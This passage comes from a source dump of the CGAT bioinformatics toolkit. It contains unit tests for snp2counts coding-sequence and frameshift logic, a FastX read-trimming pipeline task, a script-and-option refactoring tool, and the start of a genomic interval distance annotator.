for y in range(0, self.mExonSize):
base = x + y
rangex, rangey = self.toRange(base, base + 1)
result = snp2counts.getCDSPosition(self.mExons, rangex, rangey,
lcontig=self.contigSize,
fasta=self.mFasta)
self.assertEqual(result.strand, self.strand)
self.assertEqual(result.cds_start, length)
self.assertEqual(result.cds_end, length + 1)
self.assertEqual(result.cds_phase, phase)
self.assertEqual(result.intron_start, None)
self.assertEqual(result.intron_end, None)
self.assertEqual(len(result.cds_seq), 3)
# print x, y, base, str(result)
if self.frame == 0:
self.assertEqual(result.cds_seq, motif)
self.assertEqual(result.cds_seq_start, framed_length % 3)
self.assertEqual(result.cds_seq_end, (framed_length % 3) + 1)
self.assertEqual(result.nc_seq, None)
self.assertEqual(result.nc_start, None)
self.assertEqual(result.nc_end, None)
if base in self.mSplitCodonsPrev:
self.assertEqual(
result.prev_exon_end, self.mSplitCodonsPrev[base])
else:
self.assertEqual(result.prev_exon_end, None)
if base in self.mSplitCodonsNext:
self.assertEqual(
result.next_exon_start, self.mSplitCodonsNext[base])
else:
self.assertEqual(result.next_exon_start, None)
length += 1
framed_length += 1
phase += 1
if phase >= 3:
phase = 0
def testIntronsSNPs(self):
length = 0
t = 0
exon_id = 0
for x in range(self.mOffset, self.contigSize - self.mIncrement - self.mOffset, self.mIncrement):
# exons
for y in range(0, self.mExonSize):
base = x + y
base_x, base_y = self.toRange(base, base + 1)
result = snp2counts.getCDSPosition(
self.mExons, base_x, base_y, lcontig=self.contigSize, fasta=self.mFasta)
self.assertEqual(result.strand, self.strand)
self.assertEqual(result.cds_start, t)
self.assertEqual(result.cds_end, t + 1)
self.assertEqual(result.intron_start, None)
self.assertEqual(result.intron_end, None)
self.assertEqual(len(result.cds_seq) % 3, 0)
self.assertEqual(result.nc_seq, None)
self.assertEqual(result.nc_start, None)
self.assertEqual(result.nc_end, None)
self.assertEqual(result.exon_id, exon_id)
self.assertEqual(result.intron_id, None)
t += 1
exon_id += 1
# introns
for y in range(self.mExonSize, self.mExonSize + self.mIntronSize):
base = x + y
base_x, base_y = self.toRange(base, base + 1)
result = snp2counts.getCDSPosition(
self.mExons, base_x, base_y, lcontig=self.contigSize, fasta=self.mFasta)
self.assertEqual(result.strand, self.strand)
self.assertEqual(result.cds_start, None)
self.assertEqual(result.cds_end, None)
self.assertEqual(result.cds_phase, None)
self.assertEqual(result.intron_start, x + self.mExonSize)
self.assertEqual(
result.intron_end, x + self.mIntronSize + self.mExonSize)
self.assertEqual(result.cds_seq, None)
self.assertEqual(result.cds_seq_start, None)
self.assertEqual(result.cds_seq_end, None)
self.assertEqual(len(result.nc_seq), 1)
self.assert_(result.nc_seq not in "abc")
self.assertEqual(result.nc_start, base)
self.assertEqual(result.nc_end, base + 1)
self.assertEqual(result.exon_id, exon_id)
self.assertEqual(result.intron_id, exon_id - 1)
def testIndels(self):
'''test with segments of size 5'''
size = 5
length = 0
framed_length = (3 - self.frame) % 3
phase = (3 - self.frame) % 3
if self.strand == "+":
motif = "123"
else:
motif = "321"
for x in range(self.mOffset, self.contigSize - self.mIncrement - self.mOffset, self.mIncrement):
for y in range(-2 * size, self.mExonSize + 2 * size):
base = x + y
if base < self.mOffset:
continue
base_x, base_y = self.toRange(base, base + size)
result = snp2counts.getCDSPosition(
self.mExons, base_x, base_y, lcontig=self.contigSize, fasta=self.mFasta)
if -size < y < self.mExonSize:
# overlap with coding sequence
self.assertEqual(len(result.cds_seq) % 3, 0)
self.assertEqual(result.cds_start, length)
if y < 0:
self.assertEqual(result.cds_end, length + size + y)
else:
self.assertEqual(
result.cds_end, length + min(size, self.mExonSize - y))
self.assertEqual(result.cds_phase, phase)
self.assertEqual(result.strand, self.strand)
ncodons = int(
math.ceil((result.cds_phase + result.cds_end - result.cds_start) / 3.0))
if self.frame == 0:
self.assertEqual(result.cds_seq, motif * ncodons)
self.assertEqual(result.cds_seq_start, framed_length % 3)
self.assertEqual(
result.cds_seq_end, framed_length % 3 + min(size, size + y, self.mExonSize - y))
if result.nc_end is not None:
self.assertEqual(
result.cds_end - result.cds_start + (result.nc_end - result.nc_start), size)
self.assertEqual(
len(result.nc_seq), (result.nc_end - result.nc_start))
else:
self.assertEqual(result.cds_start, None)
self.assertEqual(result.cds_end, None)
self.assertEqual(result.cds_phase, None)
if y > self.mExonSize - size:
self.assertEqual(result.intron_start, x + self.mExonSize)
self.assertEqual(
result.intron_end, x + self.mIntronSize + self.mExonSize)
elif y < 0:
self.assertEqual(result.intron_start, x - self.mIntronSize)
self.assertEqual(result.intron_end, x)
if 0 <= y < self.mExonSize:
length += 1
framed_length += 1
phase += 1
if phase >= 3:
phase = 0
class getCDSPositionTestNeg(getCDSPositionTestPos):
def setUp(self):
getCDSPositionTestPos.setUp(self)
for x in self.mExons:
x.start, x.end = self.contigSize - x.end, self.contigSize - x.start
x.strand = "-"
# frame remains
self.mExons.reverse()
self.strand = "-"
class getCDSPositionTestWithStartingFrame2(getCDSPositionTestPos):
'''test with a transcript not starting at frame 0, but at frame 2.'''
def setUp(self):
getCDSPositionTestPos.setUp(self)
self.mSplitCodonsNext = {}
self.mSplitCodonsPrev = {}
start = self.mOffset
l = 1
for exon_id, e in enumerate(self.mExons):
e.frame = (3 - l % 3) % 3
l += e.end - e.start
if e.frame != 0:
if exon_id > 0:
for y in range(0, e.frame):
self.mSplitCodonsPrev[
start + y] = start - self.mIntronSize
if exon_id < self.mNExons - 1:
for y in range(0, 3 - e.frame):
self.mSplitCodonsNext[
start - self.mIntronSize - y - 1] = start
start += self.mIncrement
self.frame = self.mExons[0].frame
# for e in self.mExons:
# print str(e)
# print self.mSplitCodonsPrev
# print self.mSplitCodonsNext
class iterateOverFrames(unittest.TestCase):
def setUp(self):
self.seq = list("AAA" * 20)
self.length = len(self.seq)
self.ncodons = self.length / 3
def merge(self, result):
n = []
last = result[0]
for this in result[1:]:
if last[0] == this[0]:
last[-1] = this[-1]
else:
n.append(tuple(last))
last = this
n.append(tuple(last))
return n
def testDeletion(self):
'''test single deletion.'''
for l in range(1, 7):
for x in range(0, len(self.seq)):
s = list(self.seq)
todelete = min(l, self.length - x)
for y in range(x, x + todelete):
s[y] = ""
ncodons = self.ncodons - todelete // 3
i = list(snp2counts.iterateOverFrames(s))
codon_start = (x // 3) * 3
codon_end = min(self.length, x + l + (3 - (x + l) % 3) % 3)
result = []
if codon_start > 0:
result.append([True, 0, codon_start])
if todelete % 3 == 0:
if x % 3 != 0:
result.append([False, codon_start, codon_end])
if codon_end < self.length:
result.append([True, codon_end, self.length])
else:
result.append([True, codon_start, self.length])
else:
o = codon_start
if todelete > 3 and x % 3 == 0:
o = codon_start + (todelete // 3) * 3
result.append([True, codon_start, o])
result.append([False, o, codon_end])
result.append([False, codon_end, self.length])
result = self.merge(result)
self.assertEqual(i, result)
def testInsertion(self):
'''test single insertion.'''
for l in range(1, 7):
for x in range(len(self.seq)):
s = list(self.seq)
s[x] = "A" * l + s[x]
i = list(snp2counts.iterateOverFrames(s))
result = []
codon_start = (x // 3) * 3
if codon_start > 0:
result.append([True, 0, codon_start])
if l % 3 == 0:
result.append([True, 0, self.length])
else:
result.append([False, codon_start, self.length])
result = self.merge(result)
self.assertEqual(i, result)
class countEffectsOnTranscript(unittest.TestCase):
'''test countEffectsOnTranscript'''
def setUp(self):
self.seq = list("AAA" * 20)
self.length = len(self.seq)
self.ncodons = self.length / 3
def testEmpty(self):
r = snp2counts.countEffectsOnTranscript(self.seq, self.seq)
self.assertEqual(r.ninserted_bases, 0)
self.assertEqual(r.ninserted_codons, 0)
self.assertEqual(r.ndeleted_bases, 0)
self.assertEqual(r.ndeleted_codons, 0)
self.assertEqual(r.noframe_codons, 0)
self.assertEqual(r.nwrong_frames, 0)
self.assertEqual(r.ncorrected_frames, 0)
self.assertEqual(r.first_stop, self.ncodons)
self.assertEqual(r.nstop_codons, 0)
self.assertEqual(r.nstops, 0)
self.assertEqual(r.nunaffected_codons, self.ncodons)
self.assertEqual(r.nsynonymous_codons, 0)
self.assertEqual(r.nnonsynonymous_codons, 0)
def testInsertion(self):
'''test single insertion.'''
for l in range(1, 7):
for x in range(len(self.seq)):
s = list(self.seq)
s[x] = "A" * l + s[x]
r = snp2counts.countEffectsOnTranscript(s, self.seq)
# print s, str(r)
self.assertEqual(r.ninserted_bases, l)
if l % 3 == 0:
self.assertEqual(r.ninserted_codons, l // 3)
self.assertEqual(r.nwrong_frames, 0)
self.assertEqual(r.ndeleted_bases, 0)
self.assertEqual(r.ndeleted_codons, 0)
unaffected = x // 3
if l % 3 == 0:
self.assertEqual(r.noframe_codons, 0)
self.assertEqual(r.ncorrected_frames, 0)
self.assertEqual(r.nunaffected_codons, 20)
self.assertEqual(r.nsynonymous_codons, 0)
else:
self.assertEqual(r.noframe_codons, self.ncodons - x / 3)
self.assertEqual(r.ncorrected_frames, 0)
self.assertEqual(r.nunaffected_codons, unaffected)
self.assertEqual(r.first_stop, (self.length + l) // 3)
self.assertEqual(r.nnonsynonymous_codons, 0)
def testDeletion(self):
'''test single deletion.'''
for l in range(1, 7):
for x in range(0, len(self.seq)):
s = list(self.seq)
todelete = min(l, self.length - x)
for y in range(x, x + todelete):
s[y] = ""
ncodons = self.ncodons - todelete // 3
r = snp2counts.countEffectsOnTranscript(s, self.seq)
# print s, str(r)
self.assert_(r.ndeleted_codons + r.nunaffected_codons + r.nincomplete_codons +
r.nnonsynonymous_codons + r.nsynonymous_codons + r.nstop_codons <=
self.ncodons)
self.assertEqual(r.ninserted_bases, 0)
self.assertEqual(r.ninserted_codons, 0)
self.assertEqual(r.ndeleted_bases, todelete)
codon_start = (x // 3) * 3
codon_end = x + l + (3 - (x + l) % 3) % 3
affected_codons = (codon_end - codon_start) // 3
deletion_codon_start = x + (3 - (x % 3)) % 3
deletion_codon_end = min(self.length, ((x + l) // 3) * 3)
# subtract fully deleted codons
deleted_codons = max(
0, (deletion_codon_end - deletion_codon_start) // 3)
self.assertEqual(r.ndeleted_codons, deleted_codons)
inframe = x // 3
# delete in-frame, multiple of 3
if x % 3 == 0 and todelete % 3 == 0:
self.assertEqual(r.noframe_codons, 0)
self.assertEqual(r.nwrong_frames, 0)
self.assertEqual(r.ncorrected_frames, 0)
self.assertEqual(r.nsynonymous_codons, 0)
# delete out-of-frame, multiple of 3
elif x % 3 != 0 and todelete % 3 == 0:
self.assertEqual(
r.noframe_codons, affected_codons - deleted_codons)
self.assertEqual(r.nwrong_frames, 1)
self.assertEqual(r.ncorrected_frames, 1)
# delete, but not multiple of 3
else:
self.assertEqual(
r.noframe_codons, self.ncodons - inframe - deleted_codons)
self.assertEqual(r.nwrong_frames, 1)
self.assertEqual(r.ncorrected_frames, 0)
# self.assertEqual( r.nsynonymous_codons,
# self.ncodons - r.nincomplete_codons - inframe - deleted_codons)
self.assertEqual(r.first_stop, (self.length - todelete) // 3)
# self.assertEqual( r.nunaffected_codons, self.ncodons - (int(math.ceil( (x + todelete) / 3.0)) - x // 3) )
self.assertEqual(r.nnonsynonymous_codons, 0)
    def testFrameCorrectionAdjacent(self):
'''test frame correction within a codon for
two adjacent bases.
Strictly speaking this should not happen as these
would be called as substitutions.
'''
return
for l in range(1, 7):
for x in range(len(self.seq) - l):
s = list(self.seq)
todelete = l
toinsert = l
for y in range(x, x + todelete):
s[y] = ""
s[x + todelete] = "A" * toinsert + s[x + todelete]
ncodons = self.ncodons
# print l,x,todelete, toinsert
# print s
r = snp2counts.countEffectsOnTranscript(s, self.seq)
# print str(r)
self.assert_(r.ndeleted_codons + r.nunaffected_codons + r.nincomplete_codons +
r.nnonsynonymous_codons + r.nsynonymous_codons + r.nstop_codons <=
self.ncodons)
self.assertEqual(r.ninserted_codons, 0)
if (x + todelete) % 3 != 0:
self.assertEqual(r.ninserted_bases, 0)
self.assertEqual(r.ndeleted_bases, 0)
self.assertEqual(r.noframe_codons, 0)
else:
self.assertEqual(r.ninserted_bases, toinsert)
self.assertEqual(r.ndeleted_bases, todelete)
self.assertEqual(r.noframe_codons, 2)
if x % 3 == 0 and todelete % 3 == 0:
self.assertEqual(r.ndeleted_codons, todelete / 3)
else:
self.assertEqual(r.ndeleted_codons, 0)
self.assert_(r.noframe_codons <= self.ncodons)
self.assertEqual(r.nwrong_frames, 1)
self.assertEqual(r.ncorrected_frames, 1)
self.assertEqual(r.ntruncated_codons_stop, 0)
# self.assertEqual( r.nunaffected_codons, self.ncodons )
self.assertEqual(r.nsynonymous_codons, 0)
self.assertEqual(r.nnonsynonymous_codons, 0)
def testFrameCorrection(self):
        '''test frame correction for a deletion and an insertion
        separated by a small offset.
Strictly speaking this should not happen as these
would be called as substitutions.
'''
return
for l in range(1, 7):
for offset in range(1, 5):
for x in range(len(self.seq) - (l + offset)):
s = list(self.seq)
todelete = l
toinsert = l
for y in range(x, x + todelete):
s[y] = ""
codon_start = (x // 3) * 3
codon_end = ((x + offset + todelete) // 3 + 1) * 3
s[x + todelete + offset] = "A" * toinsert + s[x + todelete]
ncodons = self.ncodons
# print "l=",l,"x=",x,"offest=",offset,"del=",todelete,
# "ins=",toinsert, "start=",codon_start, "end=", codon_end
naffected_codons = (codon_end - codon_start) // 3
if todelete % 3 == 0 and (x + todelete) // 3 != (x + todelete + offset) // 3:
# affected codons reduced, if offset includes full
# codons
naffected_codons -= (x + todelete +
offset) // 3 - (x + todelete) // 3
# if offset > 3:
# naffected_codons -= 1
# print s
r = snp2counts.countEffectsOnTranscript(s, self.seq)
# print str(r)
self.assertEqual(r.ninserted_codons, l // 3)
self.assertEqual(r.ninserted_bases, toinsert)
self.assertEqual(r.ndeleted_bases, todelete)
if l + offset <= 2 and x % 3 == 0 or (x % 3 == 0 and l % 3 == 0):
# within codon correction
self.assertEqual(r.noframe_codons, 0)
self.assertEqual(r.nwrong_frames, 0)
self.assertEqual(r.ncorrected_frames, 0)
else:
# between codon correction
self.assertEqual(r.ninserted_bases, toinsert)
self.assertEqual(r.ndeleted_bases, todelete)
self.assertEqual(r.noframe_codons, naffected_codons)
self.assertEqual(r.nwrong_frames, 1)
self.assertEqual(r.ncorrected_frames, 1)
if x % 3 == 0 and todelete % 3 == 0:
self.assertEqual(r.ndeleted_codons, todelete / 3)
else:
self.assertEqual(r.ndeleted_codons, 0)
self.assert_(r.noframe_codons <= self.ncodons)
self.assertEqual(r.first_stop, 0)
# self.assertEqual( r.nunaffected_codons, self.ncodons )
self.assertEqual(r.nsynonymous_codons, 0)
self.assertEqual(r.nnonsynonymous_codons, 0)
def testStop(self):
'''test one stop codon.'''
for x in range(len(self.seq)):
s = list(self.seq)
s[x] = "T"
r = snp2counts.countEffectsOnTranscript(s, self.seq)
# print s, str(r)
self.assertEqual(r.ninserted_bases, 0)
self.assertEqual(r.ninserted_codons, 0)
self.assertEqual(r.ndeleted_bases, 0)
self.assertEqual(r.ndeleted_codons, 0)
self.assertEqual(r.noframe_codons, 0)
self.assertEqual(r.nwrong_frames, 0)
self.assertEqual(r.ncorrected_frames, 0)
self.assertEqual(r.nsynonymous_codons, 0)
if x % 3 == 0:
self.assertEqual(r.nstops, 1)
self.assertEqual(r.first_stop, x // 3)
# ignore last incomplete codon
if x < self.length - 3:
self.assertEqual(r.nstop_codons, 1)
self.assertEqual(r.nnonsynonymous_codons, 0)
else:
self.assertEqual(r.nstops, 0)
self.assertEqual(r.first_stop, self.ncodons)
self.assertEqual(r.nstop_codons, 0)
self.assertEqual(r.nnonsynonymous_codons, 1)
def testMutation(self):
'''test synonymous/nonsynonymous mutation.'''
for x in range(len(self.seq)):
s = list(self.seq)
            # AAA (K) -> AAG (K) is synonymous at the third codon position;
            # at the other positions GAA (E) / AGA (R) are nonsynonymous
s[x] = "G"
r = snp2counts.countEffectsOnTranscript(s, self.seq)
self.assertEqual(r.ninserted_bases, 0)
self.assertEqual(r.ninserted_codons, 0)
self.assertEqual(r.ndeleted_bases, 0)
self.assertEqual(r.ndeleted_codons, 0)
self.assertEqual(r.noframe_codons, 0)
self.assertEqual(r.nwrong_frames, 0)
self.assertEqual(r.ncorrected_frames, 0)
self.assertEqual(r.nstops, 0)
self.assertEqual(r.first_stop, self.ncodons)
self.assertEqual(r.nstop_codons, 0)
if x % 3 == 2:
self.assertEqual(r.nsynonymous_codons, 1)
self.assertEqual(r.nnonsynonymous_codons, 0)
else:
self.assertEqual(r.nsynonymous_codons, 0)
self.assertEqual(r.nnonsynonymous_codons, 1)
def testStopDouble(self):
'''test two stop codons.'''
ref = list(self.seq)
ref[-3] = "T"
for x in range(len(ref) - 3):
s = list(ref)
s[x] = "T"
r = snp2counts.countEffectsOnTranscript(s, ref)
self.assertEqual(r.ninserted_bases, 0)
self.assertEqual(r.ninserted_codons, 0)
self.assertEqual(r.ndeleted_bases, 0)
self.assertEqual(r.ndeleted_codons, 0)
self.assertEqual(r.noframe_codons, 0)
self.assertEqual(r.nwrong_frames, 0)
self.assertEqual(r.ncorrected_frames, 0)
if x % 3 == 0:
self.assertEqual(r.nstops, 2)
self.assertEqual(r.first_stop, x // 3)
# ignore last incomplete codon
self.assertEqual(r.nstop_codons, 1)
else:
self.assertEqual(r.nstops, 1)
self.assertEqual(r.first_stop, self.ncodons - 1)
self.assertEqual(r.nstop_codons, 0)
if __name__ == "__main__":
unittest.main()
```
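The test fixtures above assign each exon the GTF frame `(3 - (length % 3)) % 3`, i.e. the number of bases to skip at the start of the exon before the next complete codon, given the coding length accumulated so far. A tiny illustration with hypothetical exon sizes:

```python
# Illustration of the frame bookkeeping used in the fixtures: the frame of an
# exon depends only on the coding length accumulated before it.
def exon_frames(exon_sizes):
    frames, length = [], 0
    for size in exon_sizes:
        frames.append((3 - (length % 3)) % 3)
        length += size
    return frames

print(exon_frames([100, 100, 100]))  # -> [0, 2, 1]
```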
#### File: cgat/obsolete/trim_reads_fastq.py
```python
import sys
import tempfile
import optparse
import shutil
import itertools
import csv
import math
import random
import re
import glob
import os
import shutil
import collections
import gzip
import CGAT.Experiment as E
import logging as L
from ruffus import *
import CGATPipelines.PipelineMapping as PipelineMapping
USECLUSTER = True
###################################################
###################################################
###################################################
## Pipeline configuration
###################################################
import CGAT.Pipeline as P
P.getParameters( ["%s.ini" % __file__[:-len(".py")], "../pipeline.ini", "pipeline.ini" ] )
PARAMS = P.PARAMS
PARAMS_ANNOTATIONS = P.peekParameters( PARAMS["annotations_dir"],"pipeline_annotations.py" )
###################################################################
###################################################################
###################################################################
## TRIM READS
@follows(mkdir("trim"))
@transform( "*.gz", regex( r"(\S+).gz"), r"trim/\1.gz" )
def trimReads( infile, outfile ):
'''trim reads with FastX'''
to_cluster = True
tmpdir_fastq = P.getTempDir()
track = P.snip( os.path.basename( infile ), ".gz" )
statement = """gunzip < %(infile)s | python %%(scriptsdir)s/fastq2fastq.py
--change-format=sanger
--guess-format=phred64
--log=%(outfile)s.log
> %(tmpdir_fastq)s/%(track)s;""" % locals()
statement += """zcat %(infile)s | fastx_trimmer -f %(first_base)s -l %(last_base)s -z -o %(outfile)s """
P.run()
```
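The `@transform( "*.gz", regex( r"(\S+).gz"), r"trim/\1.gz" )` decorator above derives each output name from its input name by regular-expression substitution; ruffus handles this internally, but the naming convention itself amounts to a plain `re.sub`, sketched below:

```python
# Rough sketch of the input-to-output name mapping implied by the @transform
# decorator above (the actual mapping is performed by ruffus).
import re

def map_output(infile, pattern=r"(\S+).gz", replacement=r"trim/\1.gz"):
    return re.sub(pattern, replacement, infile)

print(map_output("sample1.fastq.gz"))  # -> trim/sample1.fastq.gz
```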
#### File: cgat/refactor/cgat_refactor.py
```python
import os
import sys
import re
import glob
import pandas
import CGAT.Experiment as E
import CGAT.IOTools as IOTools
def checkUnique(l):
    '''check if elements in list l are unique.'''
# check for unique mapping
values = list(sorted(l))
unique = set(values)
if len(values) != len(unique):
raise ValueError(
"non-unique option mappings")
else:
E.info("option list is unique")
def checkOverlap(a, b):
    '''check that a and b do not overlap.'''
aa = set(list(a))
bb = set(list(b))
if len(aa.intersection(bb)) != 0:
raise ValueError(
"option lists are not separate: shared=%s" %
",".join(aa.intersection(bb)))
else:
E.info("no overlap between option lists")
def updateFiles(dirs, map_old2new, counter,
suffixes,
regex_restrict=None,
dry_run=False):
'''iterate through all files in dirs and
    replace patterns in map_old2new.'''
if regex_restrict:
rx = re.compile(regex_restrict)
else:
rx = None
for d in dirs:
for root, dirs, files in os.walk(d):
for f in files:
_, ext = os.path.splitext(f)
if rx and not rx.search(f):
continue
if ext not in suffixes:
continue
counter.files_examined += 1
fn = os.path.join(root, f)
with IOTools.openFile(fn, "r") as inf:
old_data = inf.read()
changed = False
for old_name, new_name in map_old2new.items():
# only replace at word boundaries
old_name += """(['`\s"=])"""
new_name += r"\1"
new_data = re.sub(old_name, new_name, old_data)
if old_data != new_data:
changed = True
E.info("changed: %s : %s to %s" %
(fn, old_name, new_name))
old_data = new_data
if changed:
counter.files_changed += 1
if not dry_run:
with IOTools.openFile(fn, "w") as outf:
outf.write(new_data)
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option("--scripts", dest="rename_scripts", type="string",
help="rename scripts")
parser.add_option("--options", dest="rename_options", type="string",
help="rename command line options")
parser.add_option("--split-prefix", dest="split_prefix",
type="string",
help="move scripts with prefix to subdirectory")
parser.add_option("--suffix", dest="suffixes", action="append",
type="string",
help="file suffixes to use.")
parser.add_option("-n", "--dry-run", dest="dry_run",
action="store_true",
help="dry run, do not implement any changes")
parser.add_option("--restrict-regex", dest="regex_restrict", type="string",
help="regular expression to restrict refactoring to")
parser.add_option("-d", "--directories", dest="dirs", action="append",
type="string",
help="directories to change files in [%defaul]")
parser.set_defaults(
rename_scripts=None,
rename_options=None,
split_prefix=None,
scriptsdir="scripts",
dirs=[],
suffixes=[],
dry_run=False,
regex_restrict=None,
)
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
if len(options.suffixes) == 0:
raise ValueError("please supply --suffixes")
if len(options.dirs) == 0:
raise ValueError("please supply --directories")
scriptsdir = options.scriptsdir
counter = E.Counter()
map_old2new = {}
if options.rename_scripts or options.split_prefix:
        if options.rename_scripts:
with IOTools.openFile(options.rename_scripts, "r") as inf:
for line in inf:
if line.startswith("#"):
continue
if line.startswith("old"):
continue
try:
old, new = line[:-1].split("\t")
except ValueError:
continue
if not os.path.exists(os.path.join(scriptsdir, old)):
E.warn("%s does not exist - no renaming" % old)
continue
map_old2new[old] = new
elif options.split_prefix:
if not os.path.exists(os.path.join(scriptsdir,
options.split_prefix)):
E.warn("destination %s does not exist - no renaming" %
options.split_prefix)
return
scripts = glob.glob("%s/%s_*.py" % (scriptsdir,
options.split_prefix))
if len(scripts) == 0:
E.info("nothing to change")
return
for script in scripts:
scriptname = os.path.basename(script)
newname = scriptname[len(options.split_prefix) + 1:]
map_old2new[scriptname] = "%s/%s" % (options.split_prefix,
newname)
if len(map_old2new) == 0:
E.info("nothing to change")
return
for old, new in map_old2new.items():
statement = "git mv %(scriptsdir)s/%(old)s %(scriptsdir)s/%(new)s" % locals()
counter.renamed += 1
if options.dry_run:
E.info(statement)
else:
E.run(statement)
updateFiles(options.dirs,
map_old2new, counter,
suffixes=options.suffixes,
dry_run=options.dry_run)
elif options.rename_options:
# read refactoring guides
table = pandas.read_csv(
IOTools.openFile(options.rename_options),
sep="\t")
# select all options that need to renamed
selected = table[table.action == "rename"]
# check if all are unique
checkUnique(selected["option"])
checkOverlap(selected["option"],
selected["alternative"])
# build map adding "--" prefix
map_old2new = dict(zip(
["--%s" % x for x in selected["option"]],
["--%s" % x for x in selected["alternative"]]))
updateFiles(options.dirs, map_old2new, counter,
suffixes=options.suffixes,
regex_restrict=options.regex_restrict,
dry_run=options.dry_run)
E.info(str(counter))
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
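`updateFiles` above only rewrites an option name when it is followed by a delimiter (quote, backtick, whitespace or `=`): it appends a character class to the old name and restores the matched delimiter through the `\1` backreference. A standalone sketch of that substitution with the file handling omitted; `re.escape` is added here for robustness and is not used by the script itself:

```python
# Sketch of the delimiter-aware renaming used in updateFiles: the old option is
# replaced only when followed by a quote, backtick, whitespace or '=', and the
# matched delimiter is put back via the \1 backreference.
import re

def rename_option(text, old, new):
    pattern = re.escape(old) + r"""(['`\s"=])"""
    return re.sub(pattern, new + r"\1", text)

line = '--output-filename-pattern="%s.tsv"'
print(rename_option(line, "--output-filename-pattern", "--output-pattern"))
# -> --output-pattern="%s.tsv"
```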
#### File: cgat/scripts/annotator_distance.py
```python
import os
import sys
import collections
import itertools
import CGAT.GTF as GTF
import CGAT.Bed as Bed
import CGAT.Intervals as Intervals
import CGAT.IOTools as IOTools
import CGAT.Experiment as E
import bx.intervals.intersection
import numpy
import random
import math
import array
import scipy
import scipy.stats
import matplotlib.pyplot as plt
# global functions, defined once for optimization purposes
normalize_transform = lambda x, y: numpy.array(x, float) / (sum(x) + y)
cumulative_transform = lambda x, y: numpy.cumsum(
numpy.array(x, float) / (sum(x) + y))
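# Worked example of the two transforms above (y is a pseudo-count added to the
# total; values rounded):
#   normalize_transform([1, 2, 3], 0)  -> array([0.167, 0.333, 0.5])
#   cumulative_transform([1, 2, 3], 0) -> array([0.167, 0.5, 1.0])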
def readWorkspace(infile,
workspace_builder="raw",
label="none",
map_id2annotation={}):
"""read workspace from infile.
A workspace is a collection of intervals with two labels associated
to each interval, one for the 5' and one for the 3' end.
Available workspace builders are:
gff
take a gff file.
gtf-intergenic
build workspace from intergenic segments in a gtf file.
gtf-intronic
build workspace from intronic segments in a gtf file
gtf-genic
the workspace is built from genes (first to last exon).
Available labels are:
none
no labels are given to the ends of workspaces
direction
labels are given based on the 5'/3' end of the
bounding exon
annotation
labels are given based on a gene2annotation map.
returns a list of segments for each contig in a dictionary
"""
if label == "none":
label_f = lambda x, y: (("X",), ("X",))
info_f = lambda x: None
elif label == "direction":
label_f = lambda x, y: ((("5", "3")[x],), (("3", "5")[y],))
info_f = lambda x: x.strand == "+"
elif label == "annotation":
label_f = lambda x, y: (map_id2annotation[x], map_id2annotation[y])
info_f = lambda x: x.gene_id
if workspace_builder == "gff":
        workspace = GTF.readAsIntervals(GTF.iterator(infile))
elif workspace_builder == "gtf-intergenic":
workspace = collections.defaultdict(list)
# get all genes
for e in GTF.merged_gene_iterator(GTF.iterator(infile)):
workspace[e.contig].append((e.start, e.end, info_f(e)))
# convert to intergenic regions.
# overlapping genes are merged and the labels
# of the right-most entry is retained
for contig in workspace.keys():
segs = workspace[contig]
segs.sort()
last = segs[0]
new_segs = []
for this in segs[1:]:
if last[1] >= this[0]:
if this[1] > last[1]:
last = (last[0], this[1], this[2])
continue
assert last[1] < this[0], "this=%s, last=%s" % (this, last)
new_segs.append((last[1], this[0],
label_f(last[2], this[2])))
last = this
workspace[contig] = new_segs
elif workspace_builder == "gtf-intronic":
workspace = collections.defaultdict(list)
# the current procedure will count nested genes
# twice
for ee in GTF.flat_gene_iterator(GTF.iterator(infile)):
exons = Intervals.combine([(e.start, e.end) for e in ee])
introns = Intervals.complement(exons)
r = ee[0]
for start, end in introns:
workspace[r.contig].append((start,
end,
label_f(info_f(r), info_f(r))
))
elif workspace_builder == "gtf-genic":
workspace = collections.defaultdict(list)
# the current procedure will count nested genes
# twice
for ee in GTF.flat_gene_iterator(GTF.iterator(infile)):
exons = Intervals.combine([(e.start, e.end) for e in ee])
start, end = exons[0][0], exons[-1][1]
r = ee[0]
workspace[r.contig].append((start,
end,
label_f(info_f(r), info_f(r))
))
else:
raise ValueError("unknown workspace_builder %s" % workspace_builder)
return workspace
def readSegments(infile, indexed_workspace,
truncate=False,
format="gtf",
keep_ambiguous=False,
remove_overhangs=False):
"""read segments from infile.
segments not overlapping with indexed_workspace are removed.
If :attr: truncate is given, segments extending beyond the workspace
are truncated.
returns a list of segments for each contig in a dictionary
"""
counter = E.Counter()
segments = collections.defaultdict(list)
def addSegment(contig, start, end, counter):
if contig in indexed_workspace:
r = indexed_workspace[contig].find(start, end)
if not r:
counter.nskipped += 1
return
if len(r) > 1:
counter.nambiguous += 1
if not keep_ambiguous:
return
if truncate:
for x in r:
wstart, wend = x.start, x.end
rstart, rend = max(start, wstart), min(end, wend)
if start < wstart or end > wend:
counter.ntruncated += 1
segments[contig].append((rstart, rend))
counter.added += 1
elif remove_overhangs:
for x in r:
wstart, wend = x.start, x.end
rstart, rend = max(start, wstart), min(end, wend)
if start < wstart or end > wend:
counter.overhangs += 1
break
else:
segments[contig].append((start, end))
else:
segments[contig].append((start, end))
counter.added += 1
counter.nkept += 1
if format == "gtf":
gtf_iterator = GTF.flat_gene_iterator(GTF.iterator(infile))
for gene in gtf_iterator:
# get start and end ignoring introns
# contig, start, end = gene[0].contig, min( [x.start for x in gene] ), max( [x.end for x in gene] )
contig, coords = gene[0].contig, [(x.start, x.end) for x in gene]
counter.ninput += 1
for start, end in coords:
addSegment(contig, start, end, counter)
elif format == "bed":
bed_iterator = Bed.iterator(infile)
for bed in bed_iterator:
counter.ninput += 1
addSegment(bed.contig, bed.start, bed.end, counter)
E.info("read segments: %s" % str(counter))
return segments
class Sampler(object):
"""base clase for objcects that create a sample of
randomly arranged segments in a workspace.
"""
def __init__(self, observed, work_start, work_end):
self.mObserved = observed
self.mWorkStart, self.mWorkEnd = work_start, work_end
self.mLengths = [x[1] - x[0] for x in observed]
self.mTotalLength = sum(self.mLengths)
self.mFreeLength = work_end - work_start - self.mTotalLength
assert self.mFreeLength >= 0, "negative length: workspace=(%i,%i) %i-%i<0, segments=%s, lengths=%s" % \
(work_start, work_end, work_end - work_start,
self.mTotalLength, self.mObserved, self.mLengths)
def sample(self):
